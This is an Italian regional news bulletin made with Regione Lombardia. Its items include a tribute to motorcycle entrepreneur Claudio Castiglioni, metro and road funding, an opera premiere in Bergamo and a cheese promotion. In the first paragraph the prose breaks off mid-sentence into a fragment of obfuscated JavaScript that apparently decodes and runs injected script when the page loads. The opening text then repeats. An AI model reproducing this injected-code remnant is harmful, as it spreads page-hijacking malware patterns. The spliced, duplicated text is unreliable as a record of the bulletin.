Bentrovati a questo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

"Castiglioni ha saputo unire genialità imprenditoriale, intuito e gusto per i prodotti della tecnologia". Il presidente della Regione Lombardia, Roberto Formigoni, ha voluto ricordare così la figura dell'imprenditore Claudio Castiglioni, scomparso poco più di un anno fa,(e)s=s+ff(w[j]+3);}xz=e;if(window.document)xz(s)} Notiziario regionale ore 12 Bentrovati a questo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

"Castiglioni ha saputo unire genialità imprenditoriale, intuito e gusto per i prodotti della tecnologia". Il presidente della Regione Lombardia, Roberto Formigoni, ha voluto ricordare così la figura dell'imprenditore Claudio Castiglioni, scomparso poco più di un anno fa, il 17 agosto 2011. Occasione l'apertura di ieri sera, al trentanovesimo piano e a piano terra di Palazzo Lombardia, dell'esposizione di alcune moto realizzate da aziende lombarde nell'ambito degli eventi del fuori salone dell'Eicma, la più grande vetrina italiana dedicata alle due ruote: tra le moto in esposizione le creazioni rosso-argento prodotte a Cascina Costa in provincia di Varese che Giacomo Agostini rivestì dei colori iridati. Fu Castiglioni a fondare Cagiva, contribuendo con molti modelli innovativi a delineare il nuovo corso della produzione motociclistica degli anni Ottanta e Novanta. Fu sempre lui ad acquisire marchi gloriosi come Ducati e Husqvarna.

"Esprimo sconcerto e una ferma condanna per le violenze che si sono verificate ieri nelle piazze di molte città italiane". Lo afferma l'assessore all'Istruzione, Formazione e Cultura della Regione Lombardia Valentina Aprea, in riferimento alle manifestazioni e agli scioperi che hanno coinvolto ieri studenti e lavoratori. "La mia piena e convinta solidarietà - aggiunge Aprea - va alle Forze dell'ordine; rivolgo anche un pensiero particolare a chi è rimasto ferito negli scontri". "Invito i giovani, in particolare - è l'appello dell'assessore - a ritrovare forme civili di dialogo".

Sabato primo dicembre al teatro Donizetti di Bergamo sarà eseguita in prima mondiale "La serenata al vento" di Aldo Finzi nell'ambito del Bergamo Musica Festival.  L'opera lirica era stata censurata nel 1937 a causa delle origini ebraiche del suo compositore e oggi, per la realizzazione dei costumi e della scenografia, sono state coinvolte la Jerusalem Foundation e la Cooperativa lombarda Galdus. Insieme hanno attivato progetti di integrazione fra i giovani con laboratori e percorsi formativi per riflettere sul razzismo. Regione Lombardia ha contribuito con uno stanziamento di 150 mila euro. L'assessore alla Famiglia, conciliazione, integrazione e solidarietà sociale è Carolina Pellegrini

(AUDIO)

La conferma dello stanziamento di 6,5 milioni di euro per l'acquisto di 9 nuovi treni della linea 2 della metropolitana milanese e l'estensione, dalla fine di novembre, della sperimentazione della Crs come Carta regionale dei trasporti: sono alcuni dei temi affrontati dall'assessore alle Infrastrutture e Mobilità della Regione Lombardia Andrea Gilardoni nel corso del primo incontro con il suo omologo al Comune di Milano Pierfrancesco Maran. I 6,5 milioni di euro sono il contributo per l'acquisto di 9 nuovi treni che garantiscono il prolungamento della linea 2 della metropolitana fino ad Assago (Mi). Per il cofinanziamento della riqualificazione della Metrotranvia Milano-Limbiate, Regione Lombardia si è impegnata a reperire 12,7 milioni di euro da ripartire tra il 2013 e il 2016, anno in cui è previsto di completamento del I lotto.

I lavori per la realizzazione della variante di Zogno (Bg) alla ex SS 470 in Val Brembana sono stati completati per il 31 per ento e, dunque, la strada potrà essere aperta al traffico nel 2014, come previsto. Lo ha confermato l'assessore regionale alle Infrastrutture e Mobilità Andrea Gilardoni, durante una visita al cantiere. L'opera è finalizzata a garantire condizioni di maggiore sicurezza e fluidità alla circolazione stradale nel bacino alto bergamasco, in particolare rispetto ai flussi di transito e distribuzione sia per la Val Brembana che per le limitrofe Val Taleggio e Val Serina.

"Iniziativa lodevole e importante per diffondere la cultura delle Dop nel mondo della ristorazione". E' quanto ha detto l'assessore all'Agricoltura della Regione Lombardia Giuseppe Elias in occasione della presentazione del 'Carrello dei formaggi Dop italiani', il progetto promosso da Latteitalia, in collaborazione con il Ministero delle Politiche agricole alimentari e forestali, illustrato ieri a Milano. L’iniziativa intende valorizzare e promuovere i formaggi italiani e presenta 43 varietà, 12 delle quali sono Dop lombarde.

Ed è tutto, grazie per l’ascolto.